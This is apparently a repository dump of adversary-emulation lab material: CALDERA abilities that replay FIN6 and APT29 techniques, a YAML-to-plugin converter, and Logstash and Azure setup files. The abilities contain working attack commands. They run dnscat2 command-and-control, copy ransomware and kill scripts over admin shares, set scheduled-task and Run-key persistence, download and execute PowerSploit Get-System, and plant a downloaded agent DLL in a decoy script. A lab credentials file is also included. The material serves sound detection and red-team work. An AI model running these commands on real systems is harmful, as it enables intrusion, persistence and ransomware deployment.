31 |       default: 953CF938A09DDD4DB5FCB6EE3439ABCA6EF47740A8C0F4B062CB8E2BB23BE0C3
32 |     dnscat2_server:
33 |       description: IP address
34 |       type: string
35 |       default: 127.0.0.1
36 |   dependency_executor_name: dnscat2.ps1
37 |   dependencies:
38 |   - description: dnscat2.ps1 must exist on disk at specified location (#{dnscat_ps1})
39 |     prereq_command: if (Test-Path \#{dnscat_ps1}) {exit 0} else {exit 1}
40 |     get_prereq_command: |
41 |       $parentpath = Split-Path "#{dnscat_ps1}"; $zippath = "$parentpath\dnscat2.zip"
42 |       IEX(IWR "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-WebRequestVerifyHash.ps1")
43 |       if(Invoke-WebRequestVerifyHash "#{dnscat2_url}" "$zippath" \#{dnscat2_hash}){
44 |       Expand-Archive $zippath $parentpath\dnscat2 -Force
45 |       Move-Item $parentpath\dnscat2\dnscat2.exe "#{dnscat_ps1}"
46 |       Remove-Item $zippath, $parentpath\dnscat2 -Recurse
47 |       }
48 |   executors:
49 |   - name: powershell
50 |     command: "Start-Dnscat2 -Domain #{dnscat2_server} Exec cmd"
51 | 


--------------------------------------------------------------------------------
/environments/adversary-emulation-library/fin6/caldera/plugin/data/abilities/lateral-movement/6ffca252-9eb0-4ac0-93dd-35c9e7c6fae0.yml:
--------------------------------------------------------------------------------
 1 | - id: 6ffca252-9eb0-4ac0-93dd-35c9e7c6fae0
 2 |   name: Copy Kill Scripts
 3 |   description: FIN6 utilizes cmd to copy kill scripts to an internal distribution server
 4 |   tactic: lateral_movement
 5 |   technique:
 6 |     attack_id: T1021.002
 7 |     name: 'Remote Services: SMB/Windows Admin Shares'
 8 |   cti_source: https://www.fireeye.com/blog/threat-research/2020/05/tactics-techniques-procedures-associated-with-maze-ransomware-incidents.html
 9 |   procedure_group: procedure_ransomware_copy
10 |   procedure_step: 7.1.4
11 |   platforms:
12 |     windows:
13 |       cmd:
14 |         command: |
15 |           copy #{batch_file} \\#{internal_IP}\c$\windows\temp\
16 |   input_arguments:
17 |     internal_IP:
18 |       description: Hostname or IP address
19 |       type: string
20 |       default: 172.18.39.6
21 |     batch_file:
22 |       description: windows.bat or kill.bat
23 |       type: string
24 |   executors:
25 |   - name: command_prompt
26 |     command: copy \#{batch_file} \\#{internal_IP}\c$\windows\temp\
27 | 


--------------------------------------------------------------------------------
/environments/adversary-emulation-library/fin6/caldera/plugin/data/abilities/lateral-movement/e45dc48f-45f1-42d2-850c-4a15385c1646.yml:
--------------------------------------------------------------------------------
 1 | - id: e45dc48f-45f1-42d2-850c-4a15385c1646
 2 |   name: Copy Distribution Scripts
 3 |   description: FIN6 utilizes cmd to copy distribution scripts to an internal distribution server
 4 |   tactic: lateral-movement
 5 |   technique:
 6 |     attack_id: T1021.002
 7 |     name: 'Remote Services: SMB/Windows Admin Shares'
 8 |   cti_source: https://www.fireeye.com/blog/threat-research/2020/05/tactics-techniques-procedures-associated-with-maze-ransomware-incidents.html
 9 |   procedure_group: procedure_lateral_movement
10 |   procedure_step: 7.1.3
11 |   platforms:
12 |     windows:
13 |       cmd:
14 |         command: |
15 |           start copy xaa.bat \\#{internal_IP}\c$\windows\temp\
16 |   input_arguments:
17 |     internal_IP:
18 |       description: Hostname or IP address
19 |       type: string
20 |       default: 172.18.39.6
21 |   executors:
22 |   - name: command_prompt
23 |     command: start copy xaa.bat \\#{internal_IP}\c$\windows\temp\
24 | 


--------------------------------------------------------------------------------
/environments/adversary-emulation-library/fin6/caldera/plugin/data/abilities/lateral-movement/f50f8f39-2fb0-4fe3-9e2d-9af38aee447d.yml:
--------------------------------------------------------------------------------
 1 | - id: f50f8f39-2fb0-4fe3-9e2d-9af38aee447d
 2 |   name: Copy Ransomware
 3 |   description: FIN6 utilizes cmd to copy ransomware to an internal distribution server
 4 |   tactic: lateral-movement
 5 |   technique:
 6 |     attack_id: T1021.002
 7 |     name: 'Remote Services: SMB/Windows Admin Shares'
 8 |   cti_source: https://www.fireeye.com/blog/threat-research/2020/05/tactics-techniques-procedures-associated-with-maze-ransomware-incidents.html
 9 |   procedure_group: procedure_lateral_movement
10 |   procedure_step: 7.1.2
11 |   platforms:
12 |     windows:
13 |       cmd:
14 |         command: |
15 |           start copy xaa.bat \\#{internal_IP}\c$\windows\temp\
16 |   input_arguments:
17 |     internal_IP:
18 |       description: Hostname or IP address
19 |       type: string
20 |       default: 172.18.39.6
21 |   executors:
22 |   - name: command_prompt
23 |     command: start copy sss.exe \\#{internal_IP}\c$\windows\temp\
24 | 


--------------------------------------------------------------------------------
/environments/adversary-emulation-library/fin6/caldera/plugin/data/abilities/persistence/0864a91a-ae17-1cce-8b89-d4f8f2854699.yml:
--------------------------------------------------------------------------------
 1 | - id: 0864a91a-ae17-1cce-8b89-d4f8f2854699
 2 |   name: Scheduled Task Persistence
 3 |   description: FIN6 utilizes cmd to execute Scheduled Tasks
 4 |   tactic: persistence
 5 |   technique:
 6 |     attack_id: T1053.005
 7 |     name: 'Scheduled Task/Job: Scheduled Task'
 8 |   cti_source: https://blog.morphisec.com/new-global-attack-on-point-of-sale-systems
 9 |   procedure_group: procedure_pos_persistence
10 |   procedure_step: 5.4.2
11 |   platforms:
12 |     windows:
13 |       cmd:
14 |         command: |
15 |           "C:\Windows\System32\schtasks.exe" /create /tn #{task_name} /tr "rundll32.exe "C:\#{path}",WorkerInstance" /sc #{schedule} /ru System"
16 |   input_arguments:
17 |     task_name:
18 |       description: Task Name
19 |       type: string
20 |       default: MordorTask
21 |     path:
22 |       description: Path of task to run
23 |       type: string
24 |     schedule:
25 |       description: Schedule for task (MINUTE, HOURLY, DAILY, WEEKLY, MONTHLY, ONCE,
26 |         ONSTART, ONLOGON, ONIDLE, and ONEVENT)
27 |       type: string
28 |   executors:
29 |   - name: command_prompt
30 |     command: '"C:\Windows\System32\schtasks.exe" /create /tn #{task_name} /tr "rundll32.exe "C:\#{path}",WorkerInstance" /sc #{schedule} /ru System"'
31 | 


--------------------------------------------------------------------------------
/environments/adversary-emulation-library/fin6/caldera/plugin/data/abilities/persistence/44d82f6f-f367-4db7-aa65-a9e5717b1a21.yml:
--------------------------------------------------------------------------------
 1 | - id: 44d82f6f-f367-4db7-aa65-a9e5717b1a21
 2 |   name: Registry Run Keys
 3 |   description: FIN6 utilizes cmd to execute Registry Run Keys
 4 |   tactic: persistence
 5 |   technique:
 6 |     attack_id: T1547.001
 7 |     name: 'Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder'
 8 |   cti_source: https://blog.morphisec.com/new-global-attack-on-point-of-sale-systems
 9 |   procedure_group: procedure_pos_persistence
10 |   procedure_step: 5.4.1
11 |   platforms:
12 |     windows:
13 |       cmd:
14 |         command: |
15 |           '"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v #{value_name} /t REG_SZ /d #{data} "C:\#{path},workerInstance /f'
16 |   input_arguments:
17 |     value_name:
18 |       description: Name of the registry entry to be added
19 |       type: string
20 |       default: Mordor
21 |     data:
22 |       description: Data for new registry entry
23 |       type: string
24 |     path:
25 |       description: Path
26 |       type: string
27 |   executors:
28 |   - name: command_prompt
29 |     command: '"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v #{value_name} /t REG_SZ /d #{data} "C:\#{path},workerInstance /f'
30 | 


--------------------------------------------------------------------------------
/environments/adversary-emulation-library/fin6/caldera/plugin/data/abilities/privilege-escalation/a89ea459-97ec-28fd-a552-9d305f023bbe.yml:
--------------------------------------------------------------------------------
 1 | - id: a89ea459-97ec-28fd-a552-9d305f023bbe
 2 |   name: PowerSploit Named-Pipe Impersonation
 3 |   description: PowerSploit named-pipe impersonation, similar to the technique used to escalate to SYSTEM-level privileges by FIN6.
 4 |   tactic: privilege-escalation
 5 |   technique:
 6 |     attack_id: T1134
 7 |     name: Access Token Manipulation
 8 |   procedure_group: procedure_privesc
 9 |   procedure_step: '3.1'
10 |   platforms:
11 |     windows:
12 |       psh:
13 |         command: powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Privesc/Get-System.ps1'); Get-System -ServiceName 'mstdc' -PipeName 'mstdc'"
14 | 


--------------------------------------------------------------------------------
/environments/adversary-emulation-library/fin6/caldera/plugin/data/adversaries/123700e5-44c8-4894-a409-6484992c8846.yml:
--------------------------------------------------------------------------------
 1 | id: 123700e5-44c8-4894-a409-6484992c8846
 2 | name: FIN6 Adversary Emulation Plan
 3 | description: FIN6 is a financially motivated cyber crime group known for stealing credit card data and performing ransomware attacks.
 4 | atomic_ordering:
 5 | - e44a39ce-0651-3ddd-8f05-f83aa2ffd657
 6 | - 5b24eef2-7a7f-4d34-8cab-e588074c59bc
 7 | - d30692dd-779f-4a40-b947-de23dabbb033
 8 | - 02a96c18-f700-482d-88a8-bd311f6c41dc
 9 | - e4cdb5c6-d322-3b6e-ac8e-68b2e8a7dd4c
10 | - 2738b811-a360-4a4f-af9d-704343ebab4d
11 | - a89ea459-97ec-28fd-a552-9d305f023bbe
12 | - ff77db3d-ded1-48da-9885-8dfc097edec0
13 | - 97412b40-4940-4da1-8bff-6f11d42bca26
14 | - fd27fe6c-4846-4e94-aef9-f6bc21ab0f0e
15 | - 78d94199-7e0e-442b-81a6-32f8e419a7ac
16 | - e4027dff-280b-4964-82be-b35a40c4a493
17 | - 661efd66-d876-41de-88ee-ba9ec4328154
18 | - 44d82f6f-f367-4db7-aa65-a9e5717b1a21
19 | - 0864a91a-ae17-1cce-8b89-d4f8f2854699
20 | - e74554b8-0bc9-3d50-95a4-e45421925b49
21 | - b393c022-329a-4c52-ab1f-eb594ee8d3cd
22 | - f50f8f39-2fb0-4fe3-9e2d-9af38aee447d
23 | - e45dc48f-45f1-42d2-850c-4a15385c1646
24 | - 6ffca252-9eb0-4ac0-93dd-35c9e7c6fae0
25 | - 5599b7cf-6e8d-43c1-a311-e953dd0fbd2a
26 | - 5dcbd042-e8e5-4f3f-8055-7284e4d5112c
27 | - eb4c2ff6-3534-404c-bf1c-d864a508c162
28 | - c29e9cc7-b34f-46c2-bdbe-a41f757eae24
29 | - 0c752dce-9302-4465-805f-522650aece3f
30 | - d77838f6-d562-3480-ad29-2cbeee8b7b45
31 | 


--------------------------------------------------------------------------------
/environments/adversary-emulation-library/fin6/caldera/plugin/hook.py:
--------------------------------------------------------------------------------
 1 | from app.utility.base_world import BaseWorld
 2 | 
 3 | name = 'FIN6 Adversary Emulation Plan'
 4 | description = 'FIN6 is a financially motivated cyber crime group known for stealing credit card data and performing ransomware attacks.'
 5 | address = None
 6 | access = BaseWorld.Access.RED
 7 | 
 8 | 
 9 | async def enable(services):
10 |     pass
11 | 


--------------------------------------------------------------------------------
/environments/adversary-emulation-library/fin6/caldera/sources/ca7ef62d-20a0-493f-afd8-b5030c9a9f96.yml:
--------------------------------------------------------------------------------
1 | facts:
2 |     - trait: test
3 |       value: test
4 |     
5 | id: ca7ef62d-20a0-493f-afd8-b5030c9a9f96
6 | name: ctid_fin6
7 | rules: []


--------------------------------------------------------------------------------
/environments/adversary-emulation-library/scripts/ctid-aep-caldera.py:
--------------------------------------------------------------------------------
  1 | import sys
  2 | import yaml
  3 | from pathlib import Path
  4 | 
  5 | """
  6 | Convert CTID Adversary Emulation Plan's YAML to MITRE CALDERA Plugin.
  7 | 
  8 | Prepare:
  9 | 1. Save this script
 10 | 2. Clone the CTID "adversary_emulation_library" repository
 11 |     $ git clone git@github.com:center-for-threat-informed-defense/adversary_emulation_library.git
 12 | 3. Clone the MITRE CALDERA version 2.8.0 repository and setup it
 13 |     $ git clone https://github.com/mitre/caldera.git --recursive --branch 2.8.0 
 14 |     $ cd caldera
 15 |     $ sudo apt install -y python3-pip
 16 |     $ pip3 install -r requirements.txt
 17 | 
 18 | How to convert:
 19 | 1. Open a command shell terminal 
 20 | 2. Execute this script, for example to convert FIN6 emulation plan:
 21 |     $ python3 ctid_aep_to_caldera.py "[ctid_directory]'/fin6/Emulation_Plan/FIN6.yaml "[caldera_directory]"/plugins/ctid_fin6
 22 |    (The last argument specifies where plugins are stored, and the directory name becomes your caldera plugin name.)
 23 | 
 24 | How to enable the MITRE CALDERA Plugin:
 25 | 1. Start the MITRE CALDERA server
 26 |     $ cd "[caldera_directory]"
 27 |     $ python3 server.py --insecure
 28 | 2. Login to the MITRE CALDERA as a red team using a Google Chrome browser
 29 |     URL: http://localhost:8888/
 30 |     username: red
 31 |     password: admin
 32 | 3. Move your mouse cursor on "navigate" menu and click "configuration" in "Advanced"
 33 | 4. Click the "enable" button on the right of your plugin name in "Plugins"
 34 | 5. Restart the MITRE CALDERA Server
 35 | 
 36 | How to edit abilities:
 37 | 1. Login to the MITRE CALDERA as a red team using a Google Chrome browser
 38 | 2. Move your mouse cursor on "navigate" menu and click "adversaries" in "Campaigns"
 39 | 3. Select a emulation plan name in the "Select an existing profile" pull-down menu
 40 | 4. Drag and drop abilities to change their order
 41 | 5. Click The "?" button on the upper right of each ability to edit details
 42 | 
 43 | """
 44 | 
 45 | __license__ = "Apache License 2.0"
 46 | __copyright__ = "FUJITSU SYSTEM INTEGRATION LABORATORIES LTD."
 47 | __author__ = "Kazuhisa SHIRAKAMI"
 48 | __author_email__ = "k.shirakami@fujitsu.com"
 49 | __status__ = "prototype"
 50 | __version__ = "1.0.0"
 51 | __date__ = "02 September 2020"
 52 | 
 53 | 
 54 | class AdversaryEmulationPlan:
 55 | 
 56 |     def __init__(self, yaml_path):
 57 |         with open(yaml_path, encoding='utf-8') as f:
 58 |             first_item, *abilities = yaml.safe_load(f)
 59 |         emulation_plan_details = first_item['emulation_plan_details']
 60 |         self.id = emulation_plan_details['id']
 61 |         self.name = emulation_plan_details['adversary_name']
 62 |         self.description = emulation_plan_details['adversary_description']
 63 |         self.abilities = abilities
 64 | 
 65 | 
 66 | class CalderaPlugin:
 67 | 
 68 |     def __init__(self, path):
 69 |         path = Path(path)
 70 |         self.path = path.parent / path.name.replace(' ', '_').lower()
 71 |         self.script_path = self.path / 'hook.py'
 72 | 
 73 |     def adversary_path(self, adversary):
 74 |         return self.path / 'data' / 'adversaries' / f'{adversary.id}.yml'
 75 | 
 76 |     def ability_path(self, ability):
 77 |         path = self.path / 'data' / 'abilities'
 78 |         if 'tactic' in ability:
 79 |             path /= ability['tactic']
 80 |         path /= f'{ability["id"]}.yml'
 81 |         return path
 82 | 
 83 |     def script_template(self, adversary):
 84 |         return f"""\
 85 | from app.utility.base_world import BaseWorld
 86 | 
 87 | name = '{adversary.name}'
 88 | description = '{adversary.description}'
 89 | address = None
 90 | access = BaseWorld.Access.RED
 91 | 
 92 | 
 93 | async def enable(services):
 94 |     pass
 95 | """
 96 | 
 97 |     def save_adversary(self, adversary):
 98 |         profile = {
 99 |             'id': adversary.id,
100 |             'name': adversary.name,
101 |             'description': adversary.description,
102 |             'atomic_ordering': [ability['id'] for ability in adversary.abilities]
103 |         }
104 |         path = self.adversary_path(adversary)
105 |         path.parent.mkdir(mode=0o755, parents=True, exist_ok=True)
106 |         with open(path, 'w', encoding='utf-8') as f:
107 |             yaml.dump(profile, stream=f, sort_keys=False)
108 | 
109 |     def save_ability(self, ability):
110 |         path = self.ability_path(ability)
111 |         path.parent.mkdir(mode=0o755, parents=True, exist_ok=True)
112 |         with open(path, 'w', encoding='utf-8') as f:
113 |             yaml.dump([ability], stream=f, sort_keys=False)
114 | 
115 |     def save_script(self, adversary):
116 |         path = self.script_path
117 |         path.parent.mkdir(mode=0o755, parents=True, exist_ok=True)
118 |         with open(path, 'w', encoding='utf-8') as f:
119 |             f.write(self.script_template(adversary))
120 | 
121 | 
122 | def convert(ctid_yaml_path, plugin_path):
123 |     adversary = AdversaryEmulationPlan(ctid_yaml_path)
124 |     caldera_plugin = CalderaPlugin(plugin_path)
125 |     caldera_plugin.save_adversary(adversary)
126 |     for ability in adversary.abilities:
127 |         caldera_plugin.save_ability(ability)
128 |     caldera_plugin.save_script(adversary)
129 | 
130 | 
131 | def main():
132 |     if len(sys.argv) != 3:
133 |         print(f"Usage:", sys.argv[0], "<ctid_yaml_path>", "<plugin_path>")
134 |         exit(1)
135 |     convert(ctid_yaml_path=sys.argv[1], plugin_path=sys.argv[2])
136 | 
137 | if __name__ == '__main__':
138 |     main()


--------------------------------------------------------------------------------
/environments/attack-evals/README.md:
--------------------------------------------------------------------------------
1 | # ATT&CK Evals - Mordor Environments
2 | 
3 | This section of the project focuses on providing network environments to replicate and execute the [emulation plans](https://github.com/mitre-attack/attack-arsenal) provided by the ATT&CK Evals team.
4 | 


--------------------------------------------------------------------------------
/environments/attack-evals/apt29/azuredeploy.parameters.json:
--------------------------------------------------------------------------------
 1 | {
 2 |     "$schema": "https://schema.management.azure.com/schemas/2015-01-01/deploymentParameters.json#",
 3 |     "contentVersion": "1.0.0.0",
 4 |     "parameters": {
 5 |         "pickScenario": {
 6 |             "value": "Day1"
 7 |         },
 8 |         "adminUsername": {
 9 |             "value": "GEN-UNIQUE"
10 |         },
11 |         "adminPassword": {
12 |             "value": "GEN-PASSWORD"
13 |         },
14 |         "clientRootCertName": {
15 |             "value": "YouRootCAName"
16 |         },
17 |         "clientRootCertData": {
18 |             "value": "Base64-one-line"
19 |         }
20 |     }
21 | }
22 | 


--------------------------------------------------------------------------------
/environments/attack-evals/apt29/caldera/conf/4fb34bde-b06d-445a-a146-8e35f79ce546.yml:
--------------------------------------------------------------------------------
 1 | facts:
 2 |   - trait: target.domain.name
 3 |     value: dmevals.local
 4 |   - trait: target.winrm.username
 5 |     value: mscott
 6 |   - trait: target.winrm.password
 7 |     value: abc123!D@t3M1k3
 8 |   - trait: target.winrm.remote_host
 9 |     value: NEWYORK
10 |   - trait: pivot_machine_hostname
11 |     value: NASHUA
12 |   - trait: 7zip_password
13 |     value: lolol
14 |   - trait: profile_user
15 |     value: pbeesly
16 |   - trait: profile_user_password
17 |     value: Fl0nk3rt0n!T0by
18 |   - trait: profile_user_day2
19 |     value: dschrute
20 |   - trait: profile_user_password_day2
21 |     value: Schrut3F@rms!B33ts
22 |   - trait: onedrive.username
23 |     value: ONEDRIVE_USERNAME@outlook.com
24 |   - trait: onedrive.url
25 |     value: ONEDRIVE_URL
26 |   - trait: onedrive.password
27 |     value: ONEDRIVE_PASSWORD
28 |   
29 | id: 4fb34bde-b06d-445a-a146-8e35f79ce546
30 | name: evals-round-2
31 | rules: []
32 |   


--------------------------------------------------------------------------------
/environments/attack-evals/apt29/caldera/data/abilities/host-provision/865b6ad9-ba59-435a-bd8f-641052fc077a.yml:
--------------------------------------------------------------------------------
 1 | - id: 865b6ad9-ba59-435a-bd8f-641052fc077a
 2 |   name: Host provisioning ability for APT29 Day2 setup
 3 |   description: Download Sandcat DLL and craft payload
 4 |   tactic: host-provision
 5 |   technique:
 6 |       attack_id: T0000
 7 |       name: Host Provisioning
 8 |   platforms:
 9 |     windows:
10 |       psh,pwsh:
11 |         timeout: 300
12 |         command: |
13 |           @("schemas.ps1","make_lnk.ps1","2016_United_States_presidential_election_-_Wikipedia.html") | Move-Item -Force -Destination "C:\Users\#{profile_user_day2}\Desktop";
14 |           Move-Item -Force -Path .\MITRE-ATTACK-EVALS.HTML -Destination "C:\Users\#{profile_user_day2}\Documents";
15 |           Set-Location -Path "C:\Users\#{profile_user_day2}\Desktop";
16 | 
17 |           $url="#{server}/file/download"; $wc=New-Object System.Net.WebClient; $wc.Headers.add("platform","windows"); $wc.Headers.add("file","sandcat.go"); $wc.Headers.add("group","red-dll"); $wc.Headers.add("server","#{server}"); while($true) {try {if(($data=$wc.DownloadData($url)) -and ($name=$wc.ResponseHeaders["Content-Disposition"].Substring($wc.ResponseHeaders["Content-Disposition"].IndexOf("filename=")+9).Replace("`"","")) -and -not ([io.file]::WriteAllBytes("C:\\Users\\Public\\$name.dll",$data))) {break}} catch{sleep 60}};
18 | 
19 |           if(Test-Path -LiteralPath "C:\Users\#{profile_user_day2}\Desktop\blob"){
20 |             Remove-Item "C:\Users\#{profile_user_day2}\Desktop\blob" -Force;
21 |             Write-Host "Removed old blob file";
22 |           }
23 | 
24 |           Set-ItemProperty -Path schemas.ps1 -Name IsReadOnly -Value $false;
25 |           Set-ItemProperty -Path 2016_United_States_presidential_election_-_Wikipedia.html -Name IsReadOnly -Value $false;
26 | 
27 |           certutil -encode "C:\Users\Public\$name.dll" blob;
28 | 
29 |           (Get-Content .\blob) -join "" | Out-File -NoNewline -FilePath .\blob;
30 |           $blob = ((Get-Content .\blob) -join "") -replace "`r|`n","";
31 | 
32 |           (Get-Content schemas.ps1) -replace '\$bin = ""',"`$bin = `"$($blob)`"" | Out-File -FilePath .\schemas.ps1;
33 | 
34 |           powershell .\make_lnk.ps1;
35 | 
36 |         cleanup: |
37 |           @("schemas.ps1","make_lnk.ps1","2016_United_States_presidential_election_-_Wikipedia.html","blob") | Remove-Item -Force -Destination "C:\Users\#{profile_user_day2}\Desktop";
38 |           Remove-Item -Force -Destination "C:\Users\Public\$name.dll";
39 | 
40 |         payload: schemas.ps1,make_lnk.ps1,2016_United_States_presidential_election_-_Wikipedia.html,MITRE-ATTACK-EVALS.HTML


--------------------------------------------------------------------------------
/environments/attack-evals/apt29/caldera/docker-compose-caldera.yml:
--------------------------------------------------------------------------------
 1 | version: '3.5'
 2 | services:
 3 |   caldera-evals:
 4 |     image: cyb3rward0g/docker-caldera:evals-042720
 5 |     container_name: caldera-evals
 6 |     volumes:
 7 |       - ./conf/4fb34bde-b06d-445a-a146-8e35f79ce546.yml:/usr/src/app/plugins/evals/data/sources/4fb34bde-b06d-445a-a146-8e35f79ce546.yml
 8 |     restart: always
 9 |     ports:
10 |       - "8888:8888"
11 |       - "7010:7010/tcp"
12 |       - "7011:7011/udp"
13 |       - "7012:7012"
14 | 


--------------------------------------------------------------------------------
/environments/attack-evals/apt29/kafkacat/kafkacat.conf:
--------------------------------------------------------------------------------
1 | metadata.broker.list=<event-hub-namespace>.servicebus.windows.net:9093
2 | security.protocol=SASL_SSL
3 | sasl.mechanisms=PLAIN
4 | sasl.username=$ConnectionString
5 | sasl.password=Endpoint=sb://<event-hub-namespace>.servicebus.windows.net/;SharedAccessKeyName=RootManageSharedAccessKey;SharedAccessKey=<shared-access-key>
6 | enable.ssl.certificate.verification=false
7 | message.max.bytes=1000000


--------------------------------------------------------------------------------
/environments/attack-evals/apt29/logstash/Dockerfile:
--------------------------------------------------------------------------------
1 | # Author: Roberto Rodriguez (@Cyb3rWard0g)
2 | # License: GPL-3.0
3 | 
4 | FROM docker.elastic.co/logstash/logstash:7.6.2
5 | LABEL maintainer="Roberto Rodriguez @Cyb3rWard0g"
6 | 
7 | # ** Updating kafka integration plugin to 10.1.0
8 | # Reference: https://github.com/logstash-plugins/logstash-integration-kafka/pull/8
9 | RUN logstash-plugin update logstash-integration-kafka


--------------------------------------------------------------------------------
/environments/attack-evals/apt29/logstash/config/logstash.yml:
--------------------------------------------------------------------------------
1 | pipeline.batch.size: 500
2 | config.reload.automatic: true
3 | config.reload.interval: 60s
4 | # pipeline.workers: 2
5 | # xpack.monitoring.elasticsearch.hosts: http://helk-elasticsearch:9200
6 | # log.level: warn
7 | # http.host: "0.0.0.0"
8 | # xpack.monitoring.enabled: true


--------------------------------------------------------------------------------
/environments/attack-evals/apt29/logstash/docker-compose.yml:
--------------------------------------------------------------------------------
 1 | version: '3.5'
 2 | 
 3 | services:
 4 |   mordor-logstash:
 5 |     build: ./
 6 |     container_name: mordor-logstash
 7 |     logging:
 8 |       driver: "json-file"
 9 |       options:
10 |         max-file: "9"
11 |         max-size: "6m"
12 |     volumes:
13 |       - /opt/logstash/pipeline:/usr/share/logstash/pipeline
14 |       - /opt/logstash/scripts:/usr/share/logstash/scripts
15 |       - /opt/logstash/config/logstash.yml:/usr/share/logstash/config/logstash.yml
16 |     entrypoint: /usr/share/logstash/scripts/logstash-entrypoint.sh
17 |     environment:
18 |       - xpack.monitoring.enabled=false
19 |       - BOOTSTRAP_SERVERS=${BOOTSTRAP_SERVERS}
20 |       - SASL_JAAS_CONFIG=${SASL_JAAS_CONFIG}
21 |       - EVENTHUB_NAME=${EVENTHUB_NAME}
22 |     ports:
23 |       - "3515:3515"
24 |     restart: always
25 |     networks:
26 |       mordor:
27 | 
28 | networks:
29 |     mordor:
30 |         driver: bridge


--------------------------------------------------------------------------------
/environments/attack-evals/apt29/logstash/pipeline/eventhub.conf:
--------------------------------------------------------------------------------
 1 | # Author: Roberto Rodriguez (@Cyb3rWard0g)
 2 | # License: GPL-3.0
 3 | 
 4 | input {
 5 |    tcp {
 6 |       port => 3515
 7 |    }
 8 | }
 9 | filter {
10 |   json {
11 |     source => "message"
12 |     tag_on_failure => [ "_parsefailure", "parsefailure-critical", "parsefailure-json_codec" ]
13 |     remove_field => [ "message" ]
14 |     add_tag => [ "mordorDataset" ]
15 |   }
16 | }
17 | output {
18 |   kafka {
19 |     codec => "json"
20 |     bootstrap_servers => "${BOOTSTRAP_SERVERS}"
21 |     sasl_mechanism => "PLAIN"
22 |     security_protocol => "SASL_SSL"
23 |     sasl_jaas_config => "${SASL_JAAS_CONFIG}"
24 |     topic_id => "${EVENTHUB_NAME}"
25 |     ssl_endpoint_identification_algorithm => ""
26 |   }
27 | }


--------------------------------------------------------------------------------
/environments/attack-evals/apt29/logstash/scripts/logstash-entrypoint.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/bash
 2 | 
 3 | # Author: Roberto Rodriguez (@Cyb3rWard0g)
 4 | # License: GPL-3.0
 5 | 
 6 | # ********* Setting LS_JAVA_OPTS ***************
 7 | if [[ -z "$LS_JAVA_OPTS" ]]; then
 8 |   while true; do
 9 |     # Check using more accurate MB
10 |     AVAILABLE_MEMORY=$(awk '/MemAvailable/{printf "%.f", $2/1024}' /proc/meminfo)
11 |     if [ "$AVAILABLE_MEMORY" -ge 900 ] && [ "$AVAILABLE_MEMORY" -le 1000 ]; then
12 |       LS_MEMORY="400m"
13 |       LS_MEMORY_HIGH="1000m"
14 |     elif [ "$AVAILABLE_MEMORY" -ge 1001 ] && [ "$AVAILABLE_MEMORY" -le 3000 ]; then
15 |       LS_MEMORY="700m"
16 |       LS_MEMORY_HIGH="1300m"
17 |     elif [ "$AVAILABLE_MEMORY" -gt 3000 ]; then
18 |       # Set high & low, so logstash doesn't use everything unnecessarily, it will usually flux up and down in usage -- and doesn't "severely" despite what everyone seems to believe
19 |       LS_MEMORY="$(( AVAILABLE_MEMORY / 4 ))m"
20 |       LS_MEMORY_HIGH="$(( AVAILABLE_MEMORY / 2 ))m"
21 |       if [ "$AVAILABLE_MEMORY" -gt 31000 ]; then
22 |         LS_MEMORY="8000m"
23 |         LS_MEMORY_HIGH="31000m"
24 |       fi
25 |     else
26 |       echo "$HELK_ERROR_TAG $LS_MEMORY MB is not enough memory for Logstash yet.."
27 |       sleep 1
28 |     fi
29 |     export LS_JAVA_OPTS="${HELK_LOGSTASH_JAVA_OPTS} -Xms${LS_MEMORY} -Xmx${LS_MEMORY_HIGH} "
30 |     break
31 |   done
32 | fi
33 | echo "Setting LS_JAVA_OPTS to $LS_JAVA_OPTS"
34 | 
35 | # ********* Setting Logstash PIPELINE_WORKERS ***************
36 | if [[ -z "$PIPELINE_WORKERS" ]]; then
37 |   # Get total CPUs/cores as reported by OS
38 |   TOTAL_CORES=$(getconf _NPROCESSORS_ONLN 2>/dev/null)
39 |   # try one more way
40 |   [ -z "$TOTAL_CORES" ] && TOTAL_CORES=$(getconf NPROCESSORS_ONLN)
41 |   # Unable to get reported cores
42 |   if [ -z "$TOTAL_CORES" ]; then
43 |     TOTAL_CORES=1
44 |     echo "$HELK_ERROR_TAG unable to get number of CPUs/cores as reported by the OS"
45 |   fi
46 |   # Set workers based on available cores
47 |   if [ "$TOTAL_CORES" -ge 1 ] && [ "$TOTAL_CORES" -le 3 ]; then
48 |     PIPELINE_WORKERS=1
49 |     # Divide by 2
50 |   elif [ "$TOTAL_CORES" -ge 4 ]; then
51 |     PIPELINE_WORKERS="$(( TOTAL_CORES / 2 ))"
52 |   # some unknown number
53 |   else
54 |     echo "[!] eported CPUs/cores not an integer? not greater or equal to 1.."
55 |     PIPELINE_WORKERS=1
56 |   fi
57 |   export PIPELINE_WORKERS
58 | fi
59 | echo "Setting PIPELINE_WORKERS to ${PIPELINE_WORKERS}"
60 | 
61 | # *** Remove Default config ****
62 | rm -f /usr/share/logstash/pipeline/logstash.conf
63 | 
64 | # ********** Starting Logstash *****************
65 | echo "Running docker-entrypoint script.."
66 | /usr/local/bin/docker-entrypoint
67 | 


--------------------------------------------------------------------------------
/environments/attack-evals/apt29/nestedtemplates/customScript.json:
--------------------------------------------------------------------------------
 1 | {
 2 |     "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
 3 |     "contentVersion": "1.0.0.0",
 4 |     "parameters": {
 5 |         "vmList": {
 6 |             "type": "string",
 7 |             "minLength": 1,
 8 |             "metadata": {
 9 |                 "description": "List of virtual machines to run scripts on, if using multiple VMs, make their names comma separate. E.g. VM01, VM02, VM03."
10 |             }
11 |         },
12 |         "extensionName": {
13 |             "type": "string"
14 |         },
15 |         "fileUris": {
16 |             "type": "array"
17 |         },
18 |         "commandToExecute": {
19 |             "type": "string"
20 |         },
21 |         "location": {
22 |             "type": "string",
23 |             "metadata": {
24 |                 "description": "Location for all resources."
25 |             }
26 |         }
27 |     },
28 |     "variables": {
29 |         "vmListArray": "[split(parameters('vmList'),',')]"
30 |     },
31 |     "resources": [
32 |         {
33 |             "type": "Microsoft.Compute/virtualMachines/extensions",
34 |             "apiVersion": "2019-03-01",
